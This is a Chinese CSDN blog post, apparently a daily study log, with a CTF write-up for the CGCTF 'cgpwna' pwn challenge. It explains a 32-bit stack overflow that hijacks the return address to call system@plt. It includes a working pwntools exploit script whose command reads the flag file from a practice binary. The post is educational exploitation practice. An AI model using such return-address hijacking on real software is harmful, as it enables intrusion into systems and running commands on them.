171222 pwn-CGCTF(pwn150)

最新推荐文章于 2020-01-11 08:54:15 发布
最新推荐文章于 2020-01-11 08:54:15 发布
阅读量1.6k 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whklhhhh/article/details/78876772
版权

1625-5 王子昂 总结《2017年12月22日》 【连续第448天总结】
A. CGCTF-cgpwna
B.
简单的栈溢出,作为复习用的第一题233结果还是折腾了好久 基本概念不清啦

很明显,message函数中存在栈溢出
这里写图片描述
A和n是全局变量,s是栈上的局部变量

虽然s的长度受限,但是因为是全局变量所以可以通过A的溢出来修改n
它们在bss段,发现n紧接着A后面,A的长度是28字节,因此只要超过28,小于60就可以修改n了
之后通过溢出s来覆盖保存的ebp和ReturnAddress
s放在ebp-30h的位置,因此加上0x34的offset就可以覆盖ReturnAddress

要把执行流劫持到哪里呢?
观察函数列表,发现有个pwnme,里面调用了_system函数
那么通过pwntools的ELF函数加载,取得system在plt表中的位置就行了(GOT表也一样)

注意system的调用方式:

mov [sp], &command
call system

call system的时候会push一个return address,再往后才是参数command,因此写payload的时候也要同样留出4个字节的offset

command参数是一个字符串的指针
因为我们只有A可以用来放字符串,并且地址已知
因此向A写入command,并把A的地址作为system的参数即可

payload如下

from pwn import *
# r = remote('182.254.217.142', 10001)
p = ELF('/root/ctf/nuptzj/cgpwna')
r = process('/root/ctf/nuptzj/cgpwna')

r.sendline('1')
r.sendline('cat /home/pwn/flag\0'+'a'*(0x28))
payload = 'a'*(0x34) + p32(p.plt['system'])+'a'*4+p32(0x804a080)
r.sendline(payload)
a = r.recvall()
log.info(a)

C. 明日计划
看书

奈沙夜影
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0ctf-2017-pwn-char
02-05
2017年0ctf的pwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
CG-CTF simple machine
YenKoc的博客
04-11 348
这题讲道理还是蛮坑的,有些点如果不会的话,会卡死你,然后就是代码有点长,需要有很好的耐心。 找到主函数: 这里的mmap函数,是一个分配内存的函数,主要是存放文件的,下午也是百度了下才知道,这东西对于文件的存取和共享修改的效率有很高的提高,这里就简要的认为是个分配内存空间的函数,同时360的加固反调试mmap函数会去检测traceid的值,进行反调试,虽然这种绕过也挺简单的。2333 二.加...
CG-CTF刷题记录(一)
qq_40712959的博客
10-12 1242
md5 collision md5 collision 地址 $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else { ...
NJUPT-CGCTF pwn2 StackOverflow [Writeup]
cossack9989的博客
12-30 2049
最近肥肠地想入门一下pwn,找了道题试了一下。 题目网址:StackOverflow 栈溢出啊。。虽然我水平很菜。。还是觉得挺有意思的 不扯了,先看题。 扔到32位IDA里面看看,观察一下,发现有两个很关键的函数message与pwnme,很显然message可以用来栈溢出,pwnme可以用来调用system函数,但是Alt+T之后并没有发现‘/bin/sh’,也没有提供libc.so,这
CGCTF pwn CGfsb writeup
qq_39596232的博客
08-23 576
一、实验目的: 破解我的第一个pwn,获取flag(虽然也参考了别人*^*O*^*) 二、实验环境: Ubuntu 18.04 / gdb-peda / pwntools Windows7 IDA pro 三、实验内容: 1、题目到手,我们拿到了一个网址和ELF文件,首先我们对ELF文件进行分析: tucker@ubuntu:~/pwn_files$ checksec...
CG-CTF pwn部分wp
awxnutpgs545144602的博客
08-16 369
面向pwncgctfPWN1,When did you born题目给了一个ELF文件,和一个.C文件先运行ELF,大概如下What’s Your Birth?0What’s Your Name?0You Are Born In 0You Are Naive.You Speed One Second Here.打开.C文件,发现是ELF的源码 #include ...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
pwn-writeups:CTF pwn问题写入
02-20
pwn-writeups pwnで解いた问题のwriteup达。すごく古いやつからすごく新しいやつまであるしすごく眠い。基本的には解いたものを自分で书いたexploitと一绪においてあるが,一部これから解こうとしてあるやつが间违...
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
CTFpwn总结 入门
九层台
04-26 2万+
学了那么久pwn了,基础知识终于积累的差不多了,来这个总结希望其他学pwn的人能少走一些弯路。 0x01学pwn需要哪些知识呢? 堆栈是少不了的。要知道函数调用的时候,栈中的数据是怎么放的,知道ebp在哪,知道返回地址在哪。 能看懂汇编,2条指令要清楚,ret和call。 具备这些基础知识你就能够开始学pwn了。 0x02需要注意什么 在溢出是要清楚2个...
CG-ctf WP
weixin_30385925的博客
01-20 276
week one 1 /x00 提示:有多种解法,你能找到几种 源码: writer up: 题目直接给出了源码,get 到一个 nctf 这个变量,int ereg(string pattern, string originalstring, [array regs]);,ereg()函数用指定的模式搜索一个字符串中指定的字符串,如果匹配成功返回true,否则,则返回false,这...
CG-CTF——WP(WEB[三])
hahaha233330的博客
01-11 451
CG-CTF——WriteUp(三) 工具: ①Winhex:图片隐写工具,这个很好用。 ②在线工具HtmlEncode/BASE64转换:注意源代码里奇怪的字符串,可以尝试解码(分清类型)。 ③BurpSuite:抓包工具,这个很好用。 ④Wireshark:抓包工具。使用说明 WEB 24、SQL注入1 听说你也会注入? 题目地址 打开题目出现了一个登陆界面,已经给了密码,直接。 点击 S...
NCTF 南京邮电大学网络攻防平台 writeup(web部分)持续更新
Taowood的博客
07-22 7908
题目来源,南京邮电大学网络攻防训练平台 http://ctf.nuptzj.cn/   一、签到题 迷雾与真相就隔着一个F12,得flag ctf{flag_admiaanaaaaaaaaaaa}   二、md5 collision 题目描述如下 源码 <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5...
南京邮电大学CTF-PWN-Stack Overflow
WocW的博客
12-21 1368
经过双月赛,通过阅读同级人的WriteUp结合参赛的亲身体验。深深感觉到自己文字表达能力的欠缺,以及技术上的差距。但能意识到差距是好事,意识到了就努力去弥补。一直想要学习PWN,一拖再拖,终于开始了。 关于write up,老师说了一句话,印象深刻。“write up 是写给别人看的,不是你自己看懂了就行。” 进入正题: 把文件拖入IDA,进入main函数F5反编译,先看程序流程。 set...
CG-CTF Stack Overflow
weixin_43464124的博客
05-11 785
为了上800分也是够了… 题目地址:pwn 看了几篇wp,觉得写得总是差那么一丢丢意思 首先检查溢出点 通过双击A可以看到,A这个数组的大小为40 但其可以接受64个字符的大小 所以这是第一个溢出点 然后往下看 虽然明面上显示的是输入s是有限制的 限制为n 但是当我们双击n的时候会发现 n就在A的下面 因此我们可以通过A来溢出到n 在函数列表中我们可以看到有一个函数 名字叫做pwnme 这部明...
南邮 逆向 pwn 题解 (持续更新中)
qq_41071646的博客
03-14 1652
第一题 就不用说了 。。 直接出答案。。 第二题 就比较好玩了 其实 也能够 明白出题人的用心良苦 现在很多人 都不愿意 好好的学习汇编 包括 有一部分 同学还有学弟们 一直问我 汇编有没有用 我一直都和他们说 当你问 一个东西有没有必要学的时候 你自己内心就已经有了答案 然后 我们来看这个题 题的代码我都提取出来了 让大家看一下 int mai...
南邮ctf平台部分题解
热门推荐
xuqi7
06-11 2万+
南邮ctf平台部分wp
南邮ctf pwn1--沙窝里的王
weixin_43600412的博客
07-27 464
在虚拟机中打开终端输入file 指令,查看其是32位还是64位: 很明显,这是32位。再输入checksec命令查看其保护机制: 可以看到stack中canary found保护开启,此保护的原理机制如图 在栈底ebp上面的栈空间里面,每执行一次函数,这个机制会放入一个数,并且另外单独存放这个数,这个数是随机生成的,并且每一次都不一样,如果这个栈被木马覆盖掉,那么这个数也会被覆盖,程序执行时发现...
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值